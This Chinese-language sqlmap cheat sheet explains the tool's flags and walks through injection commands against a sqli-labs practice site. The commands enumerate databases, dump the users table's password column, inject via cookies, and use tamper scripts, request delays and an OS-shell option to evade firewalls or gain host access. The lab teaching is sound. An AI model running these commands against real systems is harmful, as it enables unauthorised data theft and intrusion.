sqlmap 常用命令

常用命令

-u 指定目标URL (可以是http协议也可以是https协议)
-d 连接数据库
–dbs 列出所有的数据库
–current-db 列出当前数据库
–tables 列出当前的表
–columns 列出当前的列
-D 选择使用哪个数据库
-T 选择使用哪个表
-C 选择使用哪个列
–dump 获取字段中的数据
–batch 自动选择yes

–smart 启发式快速判断,节约浪费时间
–forms 尝试使用post注入
-r 加载文件中的HTTP请求(本地保存的请求包txt文件)
-l 加载文件中的HTTP请求(本地保存的请求包日志文件)
-g 自动获取Google搜索的前一百个结果,对有GET参数的URL测试
-o 开启所有默认性能优化
–tamper 调用脚本进行注入
-v 指定sqlmap的回显等级
–delay 设置多久访问一次
–os-shell 获取主机shell,一般不太好用,因为没权限
-m 批量操作
-c 指定配置文件,会按照该配置文件执行动作
-data data指定的数据会当做post数据提交
-timeout 设定超时时间
-level 设置注入探测等级
–risk 风险等级
–identify-waf 检测防火墙类型
–param-del=“分割符” 设置参数的分割符
–skip-urlencode 不进行url编码
–keep-alive 设置持久连接,加快探测速度
–null-connection 检索没有body响应的内容,多用于盲注
–thread 最大为10 设置多线程

–delay

有些web服务器请求访问太过频繁可能会被防火墙拦截,使用–delay就可以设定两次http请求的延时

sqlmap 常用命令_第1张图片

–safe-url

有的web服务器会在多次错误的访问请求后屏蔽所有请求,使用–safe-url 就可以每隔一段时间去访问一个正常的页面。

–level

level有5个等级,默认等级为1,进行Cookie测试时使用–level 2 ,进行use-agent或refer测试时使用–level 3 ,进行 host 测试时使用–level 5

tamper

语法:–tamper [“脚本名称”]

当调用多个脚本的时候,脚本之间用逗号隔开,调用的脚本在 sqlmap文件夹下的 tamper 文件夹中

脚本

sqlmap 常用命令_第2张图片

get 方法注入

sqlmap 常用命令_第3张图片

sql注入检测

get型:

语法:sqlmap -u [“url”]

1 sqlmap -u http://192.168.0.6/sqli-labs-master/Less-1/?id=1

sqlmap 常用命令_第4张图片

post 方法注入

先使用bp把提交的数据包保存下来

sqlmap 常用命令_第5张图片

加上post提交的参数

sqlmap 常用命令_第6张图片

语法:sqlmap -r [“请求包的txt文件”]

sqlmap -r "/root/.sqlmap/post.txt"`

一般注入操作

sqlmap 常用命令_第7张图片

获取当前数据库名称

语法:sqlmap -u [“url”] --current-db

sqlmap -u "http://192.168.0.6/sqli-labs-master/Less-1/?id=1" --current-db

sqlmap 常用命令_第8张图片

获取指定数据库的表名:

语法:sqlmap -u [“url”] -D [‘数据库名’] --tables

sqlmap -u "192.168.0.6/sqli-labs-master/Less-1/?id=1" -D security --tables

sqlmap 常用命令_第9张图片

获取指定数据库指定表中的字段:

语法:sqlmap -u [“url”] -D [‘数据库名’] -T[‘表名’] --columns

sqlmap -u "192.168.0.6/sqli-labs-master/Less-1/?id=1" -D security -T users --columns

sqlmap 常用命令_第10张图片

获取指定数据库指定表的指定字段的字段内容:

语法:sqlmap -u [“url”] -D [‘数据库名’] -T [‘表名’] -C [‘字段名1,字段名2,…’] --dump

sqlmap -u "192.168.0.6/sqli-labs-master/Less-1/?id=1" -D security -T users -C password --dump

sqlmap 常用命令_第11张图片

需要cookie的

Header injection -Cookie

语法:sqlmap -u [“url”] --cookie [“cookie信息”] --level 2

sqlmap -u "http://192.168.0.6/sqli-labs-master/Less-20/index.php" --cookie "pma_lang=zh_CN;pma_mcrypt_iv=AoXpKxU5KcY%3D;pmaUser-1=7%2FwV%2BDOfbmI%3D;uname=admin;"

sqlmap 常用命令_第12张图片

sqlmap 常用命令_第13张图片

知道数据库名字的

sqlmap -u “http://192.168.1.1:8080/(url)” -dbms “mysql”

你可能感兴趣的:(Java,数据库,java,mysql,python,linux)